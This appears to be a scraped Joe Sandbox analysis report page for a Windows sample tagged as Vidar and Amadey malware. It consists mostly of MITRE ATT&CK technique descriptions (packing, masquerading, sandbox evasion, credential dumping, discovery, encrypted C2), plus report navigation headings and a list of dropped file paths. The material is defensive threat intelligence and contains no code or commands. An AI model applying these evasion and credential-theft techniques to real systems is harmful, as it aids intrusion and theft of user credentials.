Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report IRqsWvBBMc.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Vidar

Threatname: Amadey

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\CFHIIJDBKE.exe

C:\ProgramData\KFCFBFHIEBKJ\AFBKKF

C:\ProgramData\KFCFBFHIEBKJ\CAAAFC

C:\ProgramData\KFCFBFHIEBKJ\EHDBGD

C:\ProgramData\KFCFBFHIEBKJ\EHDBGD-shm

C:\ProgramData\KFCFBFHIEBKJ\FBGHII

C:\ProgramData\KFCFBFHIEBKJ\GHJKEH

C:\ProgramData\KFCFBFHIEBKJ\HJDBAF

C:\ProgramData\KFCFBFHIEBKJ\HJEBGH

C:\ProgramData\KFCFBFHIEBKJ\IECGIE

Windows Analysis Report
IRqsWvBBMc.exe

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre